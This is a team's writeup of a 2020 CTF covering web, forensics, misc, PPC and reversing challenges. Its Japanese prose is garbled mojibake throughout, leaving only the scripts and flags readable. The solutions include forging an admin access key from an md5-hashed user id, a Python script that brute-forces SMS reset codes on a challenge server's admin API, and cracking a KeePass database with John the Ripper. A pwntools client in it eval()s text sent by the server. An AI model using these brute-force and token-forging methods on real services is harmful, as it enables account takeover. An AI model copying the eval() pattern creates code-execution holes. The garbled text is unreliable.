2020å¹´åˆã®CTFã®Writeupã§ã™
今回ã¯ãƒãƒ¼ãƒ KogCoderã¨ã—ã¦å‚åŠ ã—ã€53ä½ã§finishã—ã¾ã—ãŸ
今回ã¯ã‚¢ãƒ‰ãƒ™ãƒ³ãƒˆã‚«ãƒ¬ãƒ³ãƒ€ãƒ¼ã«2ヶ月é…刻ã—ã¦ã„ã‚‹(ç¾åœ¨é€²è¡Œ)男も手ä¼ã£ã¦ãã‚ŒãŸã®ã§ã€1人ãƒãƒ¼ãƒ ã—ã¦ãªã„CTFã¯ã»ã‚“ã¨ä¹…々ã§ã™
1人ã˜ã‚ƒãªã„ãƒãƒ¼ãƒ ã®å¹¸ã›ã•ã‚ˆ
ã§ã¯ã€è§£ã‘ãŸå•é¡Œã®è§£èª¬ã‚’書ã„ã¦ã„ãã¾ã™
Web
Door paradox
- 支給ã•ã‚Œã¦ã„るアカウント
test
ã§ãƒã‚°ã‚¤ãƒ³ã™ã‚‹ã¨Local Storageã«32æ¡ã®access_keyãŒè¿½åŠ ã•ã‚Œã‚‹
ã“ã®ä¸èº«ãŒã€test
ã§ã®ãƒã‚°ã‚¤ãƒ³ã¨ãƒã‚°ã‚¢ã‚¦ãƒˆã‚’複数回繰り返ã—ã¦ã‚‚eccbc87e4b5ce2fe28308fd9f2a7baf3
ã§ä¸€å®šãªã®ã§ä½•ã‹ã®å®šæ•°ã ã¨æŽ¨æ¸¬
CrackStationã«æŠ•ã’ã¦ã¿ã‚‹ã¨3
ã‚’md5ã§ãƒãƒƒã‚·ãƒ¥ã—ãŸå€¤ã ã¨ç™ºè¦š
ã“ã®3
ã¨ã„ã†å€¤ã¯test
アカウントã®idã®ã‚ˆã†ãªã®ã§ã€Admin1ã®idã§ã‚ã‚‹1
ã®md5ãƒãƒƒã‚·ãƒ¥å€¤c4ca4238a0b923820dcc509a6f75849b
ã‚’access_keyã«è¨å®šã—ã¦ã¿ã‚‹ã¨messagesã‹ã‚‰è¦‹ã‚Œã‚‹ã‚„ã‚Šã¨ã‚ŠãŒå¤‰åŒ–ã—ã¦ã„ãŸ
FLAGã§æ¤œç´¢ã—ã¦1番最後ã«ä¸€è‡´ã—ãŸ(=作å•è€…ãŒæœ€åˆã‹ã‚‰ç”¨æ„ã—ã¦ã„ãŸã¨æ€ã‚れるもã®)ãŒflag - FLAG{iD00r_with_insecure_token}
Admin
-
æ¼¢ã®å…¨æŽ¢ç´¢
-
bruteforce.py
#!/usr/bin/env python3 import requests pre = requests.post("http://sherlock-message.ru/api/admin.restore") print(pre.json()) h = pre.json()["response"]["new_hash"] for i in range(260000, 280000): packet = { 'hash': h, 'sms_code': i } r = requests.post("http://sherlock-message.ru/api/admin.restore", data=packet) print(r.content) try: h = r.json()["response"]["new_hash"] except: print(r.json()["response"]["message"]) exit()
-
- FLAG{bruTe_with_hash_f0rce}
Forensics
Doc. Holmes
- some.file ã¨ã„ã†ãƒ•ã‚¡ã‚¤ãƒ«ãŒæ¸¡ã•ã‚Œã‚‹
ã†ã•ã¿ã¿ãƒãƒªã‚±ãƒ¼ãƒ³æ›°ãdocxファイルらã—ã„
docxã¯xmlã‚’zipファイルã«æŠ¼ã—ã“ã‚“ã ã ã‘ã®ãƒ•ã‚¡ã‚¤ãƒ«ã¨ã„ã†è©±ã‚’ã©ã“ã‹ã§èžã„ãŸã“ã¨ãŒã‚ã£ãŸã®ã§unzip
ä¸ã«å…¥ã£ã¦ãŸ word/media/image2.jpg ã‚’é–‹ã„ã¦ã¿ã‚‹ã¨ãã“ã«ã¯flag㌠- FLAG{ProMinentplace}
Blogger
-
http://basketball-hacker.hatenablog.jp/entry/2017/08/30/000000 ã®ã‚¹ã‚¯ãƒªãƒ—トをPython3ã§å‹•ãよã†ã«ã—ã¦ã€ã“ã®å•é¡Œã«åˆã‚ã›ã¦ãƒ•ã‚¡ã‚¤ãƒ«åã¨ã‹ã‚’調整ã—ãŸã‚‰ã„ã‘ãŸ
-
sol.py
#! /usr/bin/env python3 from scapy.all import * keymap = { 0x04: ('a','A'), 0x05: ('b','B'),0x06: ('c','C'), 0x07: ('d','D'), 0x08: ('e','E'),0x09: ('f','F'), 0x0a: ('g','G'), 0x0b: ('h','H'),0x0c: ('i','I'), 0x0d: ('j','J'), 0x0e: ('k','K'),0x0f: ('l','L'), 0x10: ('m','M'), 0x11: ('n','N'),0x12: ('o','O'), 0x13: ('p','P'), 0x14: ('q','Q'),0x15: ('r','R'), 0x16: ('s','S'), 0x17: ('t','T'),0x18: ('u','U'), 0x19: ('v','V'), 0x1a: ('w','W'),0x1b: ('x','X'), 0x1c: ('y','Y'), 0x1d: ('z','Z'),0x1e: ('1','!'), 0x1f: ('2','@'), 0x20: ('3','#'),0x21: ('4','$'), 0x22: ('5','%'), 0x23: ('6','^'),0x24: ('7','&'), 0x25: ('8','*'), 0x26: ('9','('),0x27: ('0',')'), 0x28: (' [Enter] ',' [Enter] '), 0x29: ('\x1b','\x1b'), 0x2a: (' [del] ',' [del] '), 0x2b: ('\x09','\x09'), 0x2c: ('\x20','\x20'), 0x2d: ('-','_'), 0x2e: ('=','+'), 0x2f: ('[','{'),0x30: (']','}'), 0x31: ('\\','|'), 0x33: (';',':'),0x34: ('\'','\"'), 0x35: ('`','~'), 0x36: (',','<'),0x37: ('.','>'), 0x38: ('/','?'), 0x51:(' [downArrow] ',' [downArrow] '), 0x52: (' [upArrow] ',' [upArrow] '),0x32: ('\\','|') } def read_usbdata_from_pcap(): pcap = rdpcap("usb_here.pcap") usb_data = [] for pkt in pcap: buf = pkt['Raw'].load #if buf[22] == '\x01': if len(buf[27:]) == 8: usb_data.append(buf[27:]) return usb_data def analyze_usb_data(usb_data): flag = "" for d in usb_data: if d[2] == ord('\x00') or not(ord('\00') in d[3:8]): #No Event continue if d[0] == ord('\x02') or d[0] == ord('\x20'): #press shift #binary -> int c = keymap[d[2]][1] flag += c else: #binary -> int c = keymap[d[2]][0] flag += c print(flag) def main(): data = read_usbdata_from_pcap() analyze_usb_data(data) if __name__ == '__main__': main()
-
- FLAG{like_a_b100dh0und}
Confidential
- 渡ã•ã‚ŒãŸãƒ‘ケットを調ã¹ã¦ã¿ã‚‹ã¨è‰²ã€…ãªç”»åƒã‚„å‹•ç”»ã«åŠ ãˆã¦
database.kbdx
ã¨ã„ã†ãƒ•ã‚¡ã‚¤ãƒ«ãŒ
ã©ã†ã‚„らkbdxファイルã¯KeePassã¨ã„ã†ãƒ‘スワード管ç†ã‚½ãƒ•ãƒˆã®ãƒ‡ãƒ¼ã‚¿ãƒ™ãƒ¼ã‚¹ãƒ•ã‚¡ã‚¤ãƒ«ã‚‰ã—ã„
é–‹ã“ã†ã¨ã™ã‚‹ã¨ãƒ‘スワードをè¦æ±‚ã•ã‚ŒãŸ
ãã‚“ãªã‚‚ã®çŸ¥ã‚‰ãªã„ã®ã§ã€JohnTheRipperå›ã«æŠ•ã’ãŸã‚‰ã€Œãƒ‘スワードã¯blowme!ã よã€ã¨æ•™ãˆã¦ãã‚ŒãŸ
ãã®ãƒ‘スワードã§æ”¹ã‚ã¦ãƒ‡ãƒ¼ã‚¿ãƒ™ãƒ¼ã‚¹ã‚’é–‹ãã¨10件ã®ãƒ‘スワードãŒè¦‹ã¤ã‹ã‚‹ã®ã§ã‹ãŸã£ã±ã—ã‹ã‚‰è¦‹ã¦ãã¨Andrea Leadsomã•ã‚“ã®ãƒ‘スワードã«flag㌠- FLAG{bru73_p455w0rd_4ll_n16h7_l0n6}
Misc
Deep dive
-
flag.txt ã¨ã„ã†ãƒ•ã‚¡ã‚¤ãƒ«ãŒæ¸¡ã•ã‚Œã‚‹
ã©ã†ã‚‚tarアーカイブらã—ã„ã®ã§å±•é–‹ã™ã‚‹ã¨ä»Šåº¦ã¯zipファイルãŒ
ã“ã®æ™‚点ã§ã€Œã‚ã£ã€ã“れ絶対数百回やんãªãゃã„ã‘ãªã„ã‚„ã¤ã ã€ã¨å¯Ÿã—ãŸã®ã§é©å½“ã«ã‚¹ã‚¯ãƒªãƒ—ト組んã
723回目ã®å±•é–‹ã§å‡ºã¦ã㟠flag.txt ã«flagãŒæ›¸ã„ã¦ã‚ã£ãŸ-
sol.py
#!/usr/bin/env python3 import subprocess n = 0 while True: p = subprocess.run(("unar -D -o %d %d/flag.txt" % (n + 1, n)).split()) if p.returncode == 1: subprocess.run(("unar -D -o %d %d/flag" % (n + 1, n)).split()) if p.returncode == 1: exit() n += 1
-
- FLAG{matri0sha256}
Layouts
-
ファイルåã¨å…¨ãåŒã˜ãƒ‘スワードã§æš—å·åŒ–ã•ã‚ŒãŸzipファイルãŒæ¸¡ã•ã‚Œã‚‹
ãれを展開ã™ã‚‹ã¨ã¾ãŸãƒ•ã‚¡ã‚¤ãƒ«åã¨å…¨ãåŒã˜ãƒ‘スワードã§æš—å·åŒ–ã•ã‚ŒãŸzipファイルãŒ
ã“ã®æ™‚点ã§Deep diveã¨åŒã˜åŒ‚ã„ã‚’æ„Ÿã˜ã¨ã£ãŸã®ã§å±•é–‹ç”¨ã®ã‚¹ã‚¯ãƒªãƒ—トを書ã„ãŸ-
extract.py
#!/usr/bin/env python3 import zipfile fname = "RWtm7A5f" while True: with zipfile.ZipFile(fname) as zf: zf.extractall(pwd=fname.encode('utf-8')) fname = zf.infolist()[0].filename
スクリプトãŒä¾‹å¤–ã§è½ã¡ã‚‹ã¾ã§å®Ÿè¡Œã™ã‚‹ã¨ã€flagã¨ã„ã†ãƒ•ã‚¡ã‚¤ãƒ«ãŒå‡ºã¦ãã‚‹
ã“ã®ãƒ•ã‚¡ã‚¤ãƒ«ã‚’調ã¹ã¦ã¿ã‚‹ã¨xzã§åœ§ç¸®ã•ã‚ŒãŸtarファイルã®ã‚ˆã†ãªã®ã§tar xf flag
ã¨ã—ã¦å±•é–‹
ã™ã‚‹ã¨ã€flagsã¨ã„ã†ãƒ•ã‚©ãƒ«ãƒ€ãŒ
ä¸ã«ã¯1~255ã¾ã§ã®ãƒ•ã‚©ãƒ«ãƒ€ãŒã‚ã‚Šã€ä¸€éƒ¨ã®ãƒ•ã‚©ãƒ«ãƒ€ã«ã¯ç©ºã®ãƒ•ã‚¡ã‚¤ãƒ«ãŒå…¥ã£ã¦ã„ãŸ./flags/101/9 ./flags/112/18 ./flags/123/5 ./flags/51/10 ./flags/78/3 ./flags/95/15 ./flags/102/11 ./flags/117/12 ./flags/125/21 ./flags/52/14 ./flags/83/1 ./flags/103/8 ./flags/120/13 ./flags/49/19 ./flags/52/7 ./flags/84/4 ./flags/110/16 ./flags/122/6 ./flags/49/20 ./flags/53/17 ./flags/89/2
ファイルãŒå…¥ã£ã¦ã„ãŸã¨ã“ã‚を列挙ã—ã¦ã¿ã‚‹ã¨ã€ãƒ•ã‚¡ã‚¤ãƒ«ãŒå…¥ã£ã¦ã„ãŸãƒ•ã‚©ãƒ«ãƒ€åã¯å…¨éƒ¨ascii printableãªæ•°å—ã£ã½ã„
ã¾ãŸã€ãƒ•ã‚¡ã‚¤ãƒ«åã¯1~21ã¾ã§ã®æ•°å—ãŒå…¨ã¦é‡è¤‡ã›ãšã«å˜åœ¨ã—ã¦ã„ã‚‹
試ã—ã«ã€chr(フォルダå)
ã—ãŸæ–‡å—をファイルåé †ã§ä¸¦ã¹ã¦ã¿ã‚‹ã¨
SYNT{z4ge3fux4_n5p11}
ã¨ãªã£ãŸ
ã“れをRot13ã«ã‹ã‘ã¦ã¿ãŸã¨ã“ã‚flagã«
-
- FLAG{m4tr3shk4_a5c11}
True Detective
- Googleフォームã§ä½œã‚‰ã‚Œã¦ã‚‹æŽ¨ç†å•é¡Œ
- F12を押ã—ã¦
FLAG
ã§æ¤œç´¢ã™ã‚‹ã¨"1 - FLAG{08"
ã¨ã„ã†è¨˜è¿°ãŒãƒ’ットã™ã‚‹ - ã“ã®è¿‘辺を探ã—ã¦ã¿ã‚‹ã¨ã€
"2 - c49c3d9a"
"3 - e8898343"
"4 - 7729747b"
"5 - cf1be8}"
ã¨ã„ã†è¨˜è¿°ãŒè¦‹ã¤ã‹ã‚‹ã®ã§ç•ªå·é †ã§ç¹‹ãã¨flag - FLAG{08c49c3d9ae88983437729747bcf1be8}
PPC
Magic of numbers
-
計算å•é¡ŒãŒé€ã‚‰ã‚Œã¦ãã‚‹ã®ã§evalã—ã¦è¿”ã›ã°ã„ã„ã ã‘
-
sol.py
#!/usr/bin/env python from pwn import * import base64 target = ('nc 212.47.229.1 33004'.split(' ')) io = process(target) io.readline() io.readline() io.readline() while True: out = io.readline() try: d = eval(out[4:]) except: print(out) exit() print("out:%s\ndec:%s" % (out, str(d))) payload = str(d) io.sendline(payload) io.read(12)
-
- FLAG{MaGiC_0f_NuMbErS}
Reverse
Crossw0rd
- flagã‚’
a()
,b()
,c()
,d()
,e()
,f()
ã®6ã¤ã®é–¢æ•°ã«åˆ†ã‘ã¦ç¢ºèªã—ã¦ã„る。
比較処ç†ã®ä¸èº«è‡ªä½“ã¯ãŸã 1æ–‡å—ãšã¤ã¨ã£ã¦æ¯”較ã—ã¦ã„ã‚‹ã ã‘ãªã®ã§ã€é©å½“ã«ç¹‹ã„ã§çµ‚ã‚ã‚Š - FLAG{3a5yr3v3r5ing}